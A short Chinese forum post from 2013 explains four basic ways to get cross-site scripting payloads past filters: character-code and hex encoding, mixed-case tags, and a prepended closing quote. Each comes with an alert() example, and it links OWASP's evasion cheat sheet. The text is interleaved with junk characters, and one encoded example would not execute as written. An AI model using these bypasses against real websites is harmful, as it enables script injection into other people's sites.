四种超级基础的绕过方法。+ E7 B7 _( ^; g1 E6 j% K
1.转换为ASCII码
x1 K) R. b# v& R$ Q; W i例子:原脚本为<script>alert(‘I love F4ck’)</script >
5 k2 n9 _/ P& |: C' M2 F3 n3 L. F通过转换,变成:! R0 N# ~: S9 Y/ e8 Y
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>! Q# c$ ^7 n. P6 [
0 e$ e7 [% M0 G3 t& l2.转换为HEX(十六进制)
& e. m, C3 x0 s# u2 J2 d例子:原脚本为<script>alert(‘I love F4ck’)</script>0 a/ @( e, E% E/ d$ A, H
通过转换,变成:
$ r3 y' Y! J+ j; g) y%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e5 p8 ]4 s) l; m) Q5 i
+ k6 _0 Z5 X6 I1 q h
3.转换脚本的大小写
! @5 L7 S* V% |! o例子:原脚本为<script>alert(‘I love F4ck’)</script>$ C, m3 A0 d' I4 S6 o- {8 M* t
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
. ~( e5 Q2 S7 |6 n9 e9 T( n 2 Y5 a: s# P3 \2 ]$ n$ f. k" k
4.增加闭合标记”>
0 y7 ?' O- G' ?2 U; q5 f q4 k例子:原脚本为<script>alert(‘I love F4ck’)</script>" ^/ i& ?" o1 \$ J. `; B, g# i, h
转换为:”><script>alert(‘I love F4ck’)</script>
8 y$ w6 c( O, h2 U1 P% j更详细绕过技术请参考此网页0 Y' g! V# k3 _
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet# v7 j" N/ n9 ^3 t2 I9 U: h
; K% x; h0 d0 c I! }2 J# ^转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对